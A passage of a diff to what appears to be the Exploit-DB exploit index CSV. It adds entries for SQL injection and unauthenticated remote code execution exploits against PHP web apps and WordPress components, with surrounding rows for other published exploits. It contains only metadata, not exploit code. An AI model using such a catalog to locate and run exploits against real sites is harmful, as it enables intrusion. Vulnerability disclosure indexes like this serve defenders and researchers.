34400,exploits/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,webapps,php,,2014-08-03,2014-08-24,1,,,,,,https://www.securityfocus.com/bid/42167/info
+51790,exploits/php/webapps/51790.txt,"Rail Pass Management System 1.0 - Time-Based SQL Injection",2024-02-09,yozgatalperen1,webapps,php,,2024-02-09,2024-02-09,0,,,,,,
34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php,,2010-11-16,2014-10-17,1,,,,,,https://www.securityfocus.com/bid/44880/info
16094,exploits/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,webapps,php,,2011-02-02,2011-02-03,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16094.png,http://www.exploit-db.comguestbook_1.0.zip,
32607,exploits/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2008-11-28,"Charalambous Glafkos",webapps,php,,2008-11-28,2014-03-31,1,CVE-2008-6278;OSVDB-50326,,,,,https://www.securityfocus.com/bid/32563/info
@@ -32588,6 +32593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
51663,exploits/php/webapps/51663.txt,"WordPress adivaha Travel Plugin 2.3 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
51655,exploits/php/webapps/51655.txt,"WordPress adivaha Travel Plugin 2.3 - SQL Injection",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51788,exploits/php/webapps/51788.py,"Wordpress Augmented-Reality - Remote Code Execution Unauthenticated",2024-02-09,"Milad karimi",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php,,2009-07-09,2017-05-04,1,CVE-2009-2334;OSVDB-55712,,,,http://www.exploit-db.comWordPress-2.8.zip,http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
23213,exploits/php/webapps/23213.txt,"WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php,,2003-10-03,2012-12-08,1,OSVDB-4609,,,,,https://www.securityfocus.com/bid/8756/info
30520,exploits/php/webapps/30520.txt,"WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php,,2007-08-13,2013-12-27,1,CVE-2007-4482;OSVDB-37299,,,,,https://www.securityfocus.com/bid/25413/info
@@ -33858,6 +33864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info
37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,,
17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip,
+51789,exploits/php/webapps/51789.py,"Wordpress Seotheme - Remote Code Execution Unauthenticated",2024-02-09,"Milad karimi",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,,
34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,,